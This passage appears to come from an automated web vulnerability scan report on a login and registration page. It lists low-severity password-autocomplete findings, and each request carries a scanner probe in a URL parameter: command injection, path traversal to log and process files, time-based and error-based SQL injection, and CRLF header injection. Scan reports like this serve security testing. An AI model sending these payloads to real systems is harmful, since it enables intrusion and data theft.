Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.33. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.34. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../etc/httpd/logs/error_log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error_log" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.35. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=NSFTW HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=NSFTW" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.36. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.37. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.38. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.39. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.40. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?nsextt=1%20ns=netsparker(0x000017)%20 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?nsextt=1%20ns=netsparker(0x000017)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.41. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=;ns:expression(netsparker(0x000045)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000045));" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.42. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.43. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.44. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/fd/2%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.45. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-1+OR+17-7%3d10 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+17-7%3d10" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.46. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.47. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26%20SET%20%2FA+0xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.48. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.49. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
